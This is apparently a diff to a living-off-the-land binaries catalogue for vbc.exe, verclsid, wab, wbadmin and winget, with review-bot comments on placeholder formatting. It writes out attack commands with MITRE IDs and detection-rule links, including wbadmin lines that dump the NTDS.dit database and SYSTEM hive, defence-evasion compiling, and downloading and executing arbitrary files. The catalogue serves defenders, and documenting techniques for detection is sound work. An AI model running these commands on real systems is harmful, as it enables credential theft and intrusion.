- Command: vbc.exe /target:exe c:\temp\vbs\run.vb
- Command: vbc.exe /target:exe {PATH_ABSOLUTE:.vb}
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
Privileges: User
MitreID: T1127
OperatingSystem: Windows 7, Windows 10, Windows 11
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
- Command: vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb}
Description: Binary file used by .NET to compile Visual Basic code to an executable.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
Category: Compile
@ -25,8 +25,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml


@ -6,7 +6,7 @@ Created: 2018-12-04
Commands:
- Command: verclsid.exe /S /C {CLSID}
Description: Used to verify a COM object before it is instantiated by Windows Explorer
Usecase: Run a com object created in registry to evade defensive counter measures
Usecase: Run a COM object created in registry to evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218.012
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml


@ -1,7 +1,7 @@
---
Name: Wab.exe
Description: Windows address book manager
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: wab.exe
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml
- IOC: WAB.exe should normally never be used


@ -4,14 +4,14 @@ Description: Windows Backup Administration utility
Author: Chris Eastwood
Created: 2024-04-05
Commands:
- Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
- Command: wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)
Usecase: Snapshoting of Active Directory NTDS.dit database
Category: Dump
Privileges: Administrator, Backup Operators, SeBackupPrivilege
MitreID: T1003.003
OperatingSystem: Windows Server
- Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
- Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.
Usecase: Dumping of Active Directory NTDS.dit database
Category: Dump
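Review bot: `<VERSIONIDENTIFIER>` keeps the angle-bracket style on both command lines while the Sc.exe hunk in this diff converts `<existing>` to braces; `{VERSIONIDENTIFIER}` would follow the convention the commit is introducing.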


@ -4,8 +4,8 @@ Description: Windows Package Manager tool
Author: Paul Sanders
Created: 2022-01-03
Commands:
- Command: winget.exe install --manifest manifest.yml
Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`'
- Command: winget.exe install --manifest {PATH:.yml}
Description: 'Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`'
Usecase: Download and execute an arbitrary file from the internet
Category: Execute
Privileges: Local Administrator - required to enable local manifest setting
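Review bot: "specified in .yml file" is missing an article; "specified in the .yml manifest" reads correctly and keeps the link to the `--manifest` switch that `manifest.yml` made explicit before.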
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: Remote
- Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
- Command: winget.exe install --accept-package-agreements -s msstore {name or ID}
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked
Category: Download
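Review bot: `{name or ID}` only swaps the delimiters of `[name or ID]` and leaves a placeholder with spaces, unlike every other token in this diff; a single identifier such as `{PACKAGE}` with the "name or Store ID" wording kept in the Description would match the new convention.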
